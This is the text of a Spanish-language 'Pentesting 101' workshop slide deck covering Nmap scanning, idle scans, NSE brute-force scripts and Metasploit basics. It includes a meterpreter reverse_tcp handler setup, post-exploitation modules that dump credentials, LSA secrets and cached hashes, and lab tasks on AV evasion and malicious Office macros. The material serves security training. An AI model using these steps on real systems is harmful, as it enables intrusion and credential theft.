  • 5. Paulino Calderón Pale calderon@websec.mx Twitter: @calderpwn WWW: http://calderonpale.com #cat /etc/contact Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 6. Pentesting 101 Introducción a las pruebas de penetración
  • 7. Pen testing 101 ● ¿Qué es un pentest? ● ¿Qué se obtiene de un buen pentest? ● ¿Cómo podemos llegar a ser buenos pentesters? Paulino Calderon Pale <calderon@websec.mx>Pentesting 101
  • 8. Pentesting 101 ● Existen varias metodologías y guías: ○ Penetration testing execution standard. ○ Open Source Security Testing Methodology Manual. ○ Technical Guide to Information Security Testing and Assessment. ○ SANS’ Critical Security Controls. ○ OWASP TOP 10. Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 9. Pentesting 101: Fases ● Definición de alcance ● Information gathering ● Identificación de amenazas ● Identificación de vulnerabilidades ● Explotación de vulnerabilidades ● Post explotación ● Generación de reportes =/ Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 10. ● Recolección de información ○ Descubrimiento de activos con Nmap ● Explotación de vulnerabilidades ○ Explotación de vulnerabilidades con Metasploit ○ Uso del framework de explotación Veil ● Otros ataques ○ Ataques de ingeniería social con psploitgen Agenda Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 11. Exploración de redes: ● Conceptos TCP/IP. ● Fundamentos básicos de Nmap ● Técnicas de descubrimiento de hosts ● Identificación de sistemas operativos ● Técnicas de escaneo de puertos ● Identificación de servicios ● Recolección de información ● Ataques de fuerza bruta ● Detección de vulnerabilidades Explotación de vulnerabilidades: ● Uso de metasploit para la explotación de vulnerabilidades ● Identificación de servicios vulnerables ● Exfiltración de información utilizando metasploit ● Evasión de antivirus con Veil Evasion Ataques de ingeniería social: ● Ataques de phishing ● Evasión de filtros con pssploitgen ¿Qué aprenderemos? Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 12. ● Kali 32 bits (root:toor) Máquinas vulnerables: ● P1 ● Información de máquinas virtuales Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 14. Descubrimiento de activos ● Siempre usen Wireshark para analizar el tráfico como ejercicio inicial. ● ¿Sabemos que equipos estan conectados a la red? ● ¿Cómo podemos hacer este proceso de la forma más eficiente? El arte de la exploración de redes informáticas Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 15. Wireshark ● Rápidamente se pueden listar los hosts comunicándose en la red. ● Permite aplicar filtros para visualizar fácilmente la información que necesitamos. ● Se obtiene mucha información sobre la red solo con mirar el tráfico por 15 minutos. El arte de la exploración de redes informáticas Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 16. Plugins de Wireshark El arte de la exploración de redes informáticas Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 17. Wireshark 101 ● Algunos filtros útiles son: ○ tcp.port==80 ○ ip.addr==192.168.1.1 ○ ip.src==192.168.1.1 o ip.dst==192.168.1.1 ○ http ○ http.request ○ tcp contains password ○ !(arp or icmp or dns) ○ eth.addr==de:ad:be:ef:ca:fe El arte de la exploración de redes informáticas Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 18. Práctica ● Analiza el tráfico de la red actualmente. ○ ¿Qué protocolos son los más usados? ○ ¿Detectaron alguna posible vulnerabilidad? El arte de la exploración de redes informáticas Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 19. Conceptos TCP/IP Antes de continuar unos conceptos: ● Conexión TCP de 3 vías ● Banderas TCP/IP ● Notación CIDR Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 20. Conexiones TCP Las conexiones TCP requieren iniciar una conexión para transmitir o recibir datos. Debemos entender el protocolo de enlace de tres vías. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 21. Establecimiento de conexión TCP: Enlace de 3 vías ● Host #1 envia un paquete SYN a Host #2. ● Host #2 envia SYN/ACK a host #1 ● Host #1 envia ACK a host #2 y se establece la conexión. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 22. Notación CIDR (IPv4) ● Dirección IP más sufijo: 192.168.0.1/24 ● Algunas equivalencias: ○ /32 ==1 host == ○ /24 ==254 hosts==255.255.255.0 ○ /16==65,534 hosts==255.255.0.0 ● En UNIX existe la herramienta ipcalc.El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 23. Notación CIDR (IPv4) El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 24. Nmap ● Página oficial: http://nmap.org ● Nmap es una herramienta de código abierto para exploración de redes y auditorías de seguridad.(*) ● Se diseñó para analizar rápidamente grandes redes, aunque funciona muy bien contra equipos individuales. (*) ● Esencial para pentesters y administradores de sistemas. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 25. Descargando e instalando Nmap Para descargarlo desde el repositorio oficial: $svn co https://svn.nmap.org/nmap Para instalarlo: $./configure $make #make install El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 26. Dependencias ● libssl-dev ● autoconf ● make ● g++ El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 27. Manteniendo tu copia al día ● Para actualizar su copia de nmap: $svn up $make -j4 #make install El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 28. Práctica Ejecute Nmap e identifique que información regresa. $nmap <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 29. Práctica Ejecute Nmap e identifique que información regresa. Nmap scan report for scanme.nmap.org Host is up (0.011s latency). Not shown: 996 closed ports PORT STATE SERVICE 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 30. Escaneo básico de Nmap Un escaneo de Nmap sin argumentos regresa: ○ Estado del objetivo (en línea/desconectado) ○ La dirección IP y nombre de host. ○ Lista de servicios y puertos. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 31. Práctica Inicien un escaneo a su propia máquina. ● ¿Qué encontraron? ● ¿Algún servicio que no sabían que existía? El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 32. Guardando escaneos de Nmap Para guardar escaneos en los formatos grepable, XML y normal utilicen el argumento “-oA”: $nmap -oA escaneo1 <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 33. Resolución de nombres (DNS) ● Servidores DNS resuelven nombres de dominio a direcciones IP. ● ¿Qué servidores usan? ○ Los de su ISP ○ Google (8.8.8.8 y 8.8.4.4) ○ Internos El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 34. Especificando servidores DNS Para especificar que servidores DNS debe usar Nmap: $nmap --dns-servers 8.8.8.8,8.8.4.4 <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 35. ¿Por qué hacer descubrimiento de hosts? ● Para realizar un inventario de los equipos conectados a nuestra red. ● Para descubrir que equipos estan activos. ● Para optimizar el proceso de descubrimiento de servicios. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 36. Descubriendo equipos en la red ● Nmap utiliza las siguientes técnicas: ● SYN/ACK ● UDP ● SCPT INIT ● ICMP El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 37. Descubriendo equipos en la red Durante la fase de descubrimiento de hosts, por default Nmap envia: ● Una petición ICMP Echo Request ● Un paquete TCP SYN a puerto 443 ● Un paquete ARP al puerto 80 ● Una petición ICMP Timestamp El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 38. Descubriendo equipos en la red ● Mandando ICMP Echo Requests a solo un host: ping <objetivo> ● O con Nmap: $nmap -sP -PE <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 39. Descubriendo equipos en la red ● Si estan en la misma red Nmap utilizará peticiones ARP. ● Si la red es externa usará escaneo ICMP/SYN. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 40. TCP SYN Ping ● Nmap utilizará los paquetes de respuesta RST o SYN/ACK para determinar si el objetivo está en línea. ● Por default se manda al puerto 80. nmap -PS80 <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 41. TCP ACK Ping ● Nmap utilizará los paquetes de respuesta RST para determinar si el objetivo está en línea. ● Por default se manda al puerto 80. ● Requiere privilegios para crear raw sockets. De lo contrario usa el método TCP SYN. nmap -PA80 <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 42. UDP Ping ● Un host responde con el mensaje ICMP port unreachable cuando se envía un paquete UDP a un puerto cerrado. ● El host puede responder con otro tipo de mensajes de error ICMP. ● Nmap utiliza estos mensajes para identificar si un host esta en linea. ● Es importante lanzar este “probe” contra un puerto cerrado. #nmap -PU21,80,53 <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 43. SCTP INIT Ping ● Un host responde con ABORT o INIT ACK si esta en línea. ● Este tipo de escaneo requiere privilegios para crear paquetes “raw”. ● Este probe es enviado al puerto 80 por default. # nmap -PY80 <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 44. IP Protocol Ping ● Lanza paquetes IP para tratar de ocasionar algún tipo de respuesta. ● Por default Nmap usa los siguientes protocolos: ○ ICMP (protocolo #1) ○ IGMP (protocolo #2) ○ IP-in-IP (protocolo #4) #nmap -P0 <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 45. Personalizando “probes” de descubrimiento Se puede personalizar los puertos que son utilizados para la fase de descubrimiento de hosts. # nmap -sP -PS22,3389 192.168.0.1/24 # nmap -sP -PU53 192.168.0.1/24 El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 46. Descubriendo equipos en la red ● Barrido DNS: $nmap -R -sn <objetivo(s)> $nmap --dns-servers server1,server2 -R - sn <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 47. Descubriendo equipos en la red | broadcast-upnp-info: | 192.168.0.5 | Server: TP-LINK/TL-SC3230N/6.E.2.10117/169.254.88.241 | Location: http://192.168.0.5:49152/edevicedesc.xml | 192.168.0.8 | Server: Linux/3.0.8, UPnP/1.0, Portable SDK for UPnP devices/1.6.14 | Location: http://192.168.0.8:49152/description.xml | 192.168.0.42 | Server: Microsoft-Windows/6.2 UPnP/1.0 UPnP-Device-Host/1.0 |_ Location: http://192.168.0.42:2869/upnphost/udhisapi.dll? content=uuid:383283d1-d95c-4211-9525-b27af762e967 El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 48. Práctica Descubre que información existe en la red actual usando peticiones de tipo multicast. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 49. Práctica Descubre que información existe en la red actual usando peticiones de tipo multicast. $nmap --script broadcast -sn -Pn -n El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 50. Identificación de sistema operativo La funcionalidad de detección de sistema operativo requiere de privilegios especiales, específicamente permisos para crear “raw sockets”. #nmap -sV -O <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 51. Identificación de sistema operativo Limitar escaneo a objetivos con un puerto abierto y uno cerrado: #nmap -sV -O --osscan-limit <objetivo(s)> ¿Qué hacer si Nmap no detecta el sistema operativo? #nmap -sV -O --osscan-guess <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 52. Práctica Evadir la detección de sistema operativo en un ambiente UNIX. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 53. Práctica Evadir la detección de sistema operativo. #echo 128 > /proc/sys/net/ipv4/ip_default_ttl El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 54. Desactivando escaneo de puertos ● Para desactivar el escaneo de puertos se usa el argumento “-sn”: $nmap --script broadcast -sn El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 55. Desactivando descubrimiento de hosts ● Para desactivar la fase de descubrimiento de hosts: $nmap -Pn -p80 <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 56. Técnicas de escaneo ● TCP SYN ● TCP Connect ● UDP ● TCP Null ● FIN ● XMAS El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 57. Posibles estados de un puerto ● open (abierto) ● closed (cerrado) ● filtered (filtrado) ● unfiltered (no filtrado) ● open|filtered (abierto|filtrado) ● close|filtered (cerrado|filtrado) El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 58. Especificando puertos ● Para especificar un rango $nmap -p1-100 <objetivo(s)> ● Pueden listar diferentes puertos separandolos con comas: $nmap -p22,23,80 <objetivo(s)> ● Pueden escanear absolutamente todos los puertos disponibles $nmap -p- <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 59. Especificando puertos ● También se pueden usar nombres de servicios $nmap -p smtp <objetivo(s)> ● Y nombres de servicio con wildcards: $nmap -p smtp* <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 60. Detección de servicios Para iniciar el modo de detección de servicios se usa el argumento “-sV”: $nmap -sV <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 61. ¿Qué hacer cuando no los detecta? Nmap determina que firmas usar basado en un nivel de “rareza”. Si el servicio que queremos identificar corre en un puerto no estándar: $nmap -sV --version-all <objetivo(s)> $nmap -sV --version-intensity 9 <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 62. Identificación de servicios vulnerables ¿Cómo usamos esta información para saber si un servicio es vulnerable? Si la identificación de versión es exitosa simplemente tenemos que revisar que vulnerabilidades han sido publicadas antes. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 63. Timing templates ● Existe un alias para usar diferentes configuraciones de rendimiento y ajustes de tiempos de espera predeterminados: -T1-5. ● T3 es el valor default que Nmap usa. $nmap -sV -O -T4 <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 64. Otros valores interesantes de optimización min-hostgroup/max-hostgroup: Número de hosts a escanear simultáneamente. min-parallelism/max-parallelism: Número de transmisiones simultáneas. max-retries: Número de retransmisiones. host-timeout: Tiempo de espera antes de ignorar un host. scan-delay: Tiempo de espera entre “probes”. min-rate/max-rate: Número de paquetes por segundo.El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 65. TCP SYN Scan ● Escaneo utilizando técnica de “media conexión”. ● Método default de escaneo en Nmap. #nmap -sS <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 66. TCP Connect Scan ● Técnica de escaneo que establece una conexión completa para determinar si ● Método default de escaneo en Nmap ejecutándose sin privilegios. $nmap -sT <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 67. TCP ACK Scan ● Útil para detectar firewalls. ● Esta técnica solo determina si los puertos estan filtrados o no filtrados. Es decir, no determina si el puerto esta abierto o cerrado. $nmap -sA <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 68. Idle scan El idle scan es una técnica en la cual usamos la predictibilidad del número de secuencia TCP IP de una máquina ”zombie” para escanear a nuestro objetivo escondiendo nuestro verdadero origen. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 69. Idle scan Esta técnica depende de la predictibilidad del número de secuencia TCP ID Un candidato bueno para ser usado como zombie: Debe de estar ”idle”. En nuestro mismo netblock de preferencia. Impresoras, web cams y routers son muy buenos candidatos. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 70. Idle scan Para encontrar zombies: #nmap -F --script ipidseq -n <host/ip> #nmap -O -v <host/ip> Usandolos: #nmap -Pn -sI ZOMBIE OBJETIVO El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 71. Idle scan Checamos el IP ID del zombie Mandamos paquete SYN spoofeado como si viniera del zombie El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 72. Idle scan ● El objetivo regresa un SYN/ACK ● El zombie regresa un RST e incrementa su IP ID ● Nosotros checamos el IP ID, si incremento el puerto esta abierto. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 73. Tarea para después ● Encuentra un host con id de secuencia TCP IP incremental. ● Determinemos si nuestro ISP tiene protección contra paquetes spoofeados El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 74. IP Protocol Scan El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 75. Ndiff El arte de la exploración de redes Paulino Calderon calderon@websec.mx Herramienta diseñada para comparar escaneos de Nmap. Toma escaneos guardados en formato XML. $ndiff scan1.xml scan2.xml Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 76. Práctica ● Implementar un sistema de monitoreo utilizando Nmap y Ndiff. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 77. Práctica ● Implementar un sistema de monitoreo utilizando Nmap y Ndiff. 1. Realizar un escaneo que refleje el estado “bueno” de la red. 2. Utiliza Ndiff para comparar el estado actual con el primer escaneo realizado. 3. Automatiza la tarea! El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 78. Desarrollo NSE (Nmap Scripting Engine) Paulino Calderon calderon@websec.mx ● Motor de scripts que ha expandido la funcionalidad de Nmap en todos los aspectos. ● Actualmente existen más de 400 scripts (435 el día que escribí esto) en el repositorio oficial. NSE == "Nmap Scripting Engine" Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 79. Más consejos de uso ● Es difícil recordar el nombre de todos los argumentos. Mantengan abierta una consola en el folder de los scripts y usen: cat <script> | grep @args ● No existe una función de autocompletar. ( Entren al folder de scripts y ejecuten sus escaneos desde ahí? ). Desarrollo NSE (Nmap Scripting Engine) Paulino Calderon calderon@websec.mx http://guadalajaracon.org GuadalajaraCON Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 80. Ataques de fuerza bruta Una de las funciones más poderosas de NSE. Existen 51 protocolos soportados en este momento. Los argumentos relevantes cuando trabajamos con estos scripts son: ● userdb: Archivo que contiene los nombres de usuario. ● passdb: Archivo que contiene las posibles contraseñas. ● firstOnly: Detener el script cuando se encuentre la primera combinación válida. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 81. Práctica Realiza un ataque de fuerza bruta contra el servicio de MySQL de la máquina #3. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 82. Práctica Realiza un ataque de fuerza bruta contra el servicio de MySQL de la máquina #3. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 83. Recolección de información Además de la lista de servicios existe más información que nos puede ser de ayuda como: ● Nombres virtuales de dominio. ● Entradas DNS con nombres comunes. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 84. Recolección de información Además de la lista de servicios existe más información que nos puede ser de ayuda como: ● Nombres virtuales de dominio. ● Entradas DNS con nombres comunes. El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 85. Descubriendo entradas DNS El script dns-brute lanza un ataque de diccionario para encontrar entradas DNS. $nmap --script dns-brute <objetivo(s)> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 86. Descubriendo sitios móviles Existe el script http-mobileversion-checker que compara peticiones usando diferentes cabeceras User Agent para descubrir sitios móviles: $nmap -p80,443 --script http-mobileversion- checker <objetivo> El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 87. Descubriendo vulnerabilidades de inyección de código en webapps NSE también tiene scripts para automatizar la detección de posibles vulnerabilidades de tipo: ● Cross Site Scripting ● SQL Injection ● Local File Inclusion El arte de la exploración de redes Paulino Calderon calderon@websec.mx Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 89. Metasploit es un framework de explotación de vulnerabilidades que actualmente cuenta con: ● +1,300 exploits ● +700 módulos auxiliares ● +300 payloads ● +30 encoders http://www.metasploit.com/ Metasploit 101 Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 90. ● Integración con PostreSQL. ● Meterpreter Metasploit 101: Otros aspectos interesantes Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 91. Para realizar búsquedas: search “oracle” Para establecer valores de variables: set <VARIABLE> <VALOR> Para establecer valores de variables: setg <VARIABLE> <VALOR> Para obtener información sobre un módulo: info <modulo> Metasploit 101 Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 92. Para seleccionar un módulo: use <modulo> Para ver las opciones del módulo: show options Metasploit 101 Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 93. Listado de sesiones activas: sessions -l Iniciar modo interactivo con alguna sesión sessions -i <# de sesión> Para regresar a la consola de msf background Metasploit 101 Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 94. Ejecución de múltiples comandos use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 443 set ExitOnSession false set AutoRunScript multi_console_command -rc autorun-msf.rc exploit -j
  • 95. Ejecución de múltiples comandos run post/windows/escalate/getsystem run post/windows/gather/credentials/credential_collector run post/windows/gather/lsa_secrets run post/windows/wlan/wlan_profile run post/windows/gather/cachedump run post/windows/gather/enum_db run post/windows/gather/screen_spy
  • 96. ● Obtén la mayor cantidad de llaves de las máquinas vulnerables. Prácticas: Metasploit 101 Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 97. ● ¿Cómo funcionan los AVs? ● ¿Qué vamos a hacer si casi el 100% de las organizaciones utilizan algún AV? ● ¿AV is dead? Evasión de antivirus Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 98. ● Genera un binario de meterpreter que no sea detectado por el AV instalado en tu sistema. Práctica: Evasión de antivirus Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 99. Existen otros ataques de redes que funcionan cerca del 100% del tiempo: ● WPAD spoofing ● LLMNR spoofing ● ARP spoofing Otros ataques a redes Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 101. ● ¿Qué es un ataque de ingeniería social? ● ¿Qué tan efectivos son estos ataques? Ataques de ingeniería social Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 102. ● Crea un documento de Office con un macro malicioso Práctica: Ataques de ingeniería social Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 103. ● ¿Qué hacemos una vez que tenemos nuestra primera cuenta? ● ¿Qué información necesitamos recolectar en esta etapa? Post explotación Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 104. ● VMWare: http://vmware.com ● Virtualbox: http://virtualbox.com ● Kali: http://kali.org ● Wireshark: http://wireshark.com ● Nmap: http://nmap.org ● Metasploit: http://metasploit.com ● Responder: https://github.com/SpiderLabs/Responder ● Veil Framework: https://github.com/Veil-Framework/ ● Psploitgen: https://bitbucket.org/jsthyer/psploitgen ● Vulnhub: http://vulnhub.com/ ● Pentester Lab: http://pentesterlab.com/ #cat /etc/resources Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 105. ● OWASP: https://www.owasp.org/index.php/Main_Page ● OSTMM: http://www.isecom.org/research/osstmm.html ● Penetration Testing Execution Standard: http://www.pentest-standard. org/index.php/Main_Page #cat /etc/resources Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
  • 106. Paulino Calderón Pale calderon@websec.mx Twitter: @calderpwn WWW: http://calderonpale.com #cat /etc/contact Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>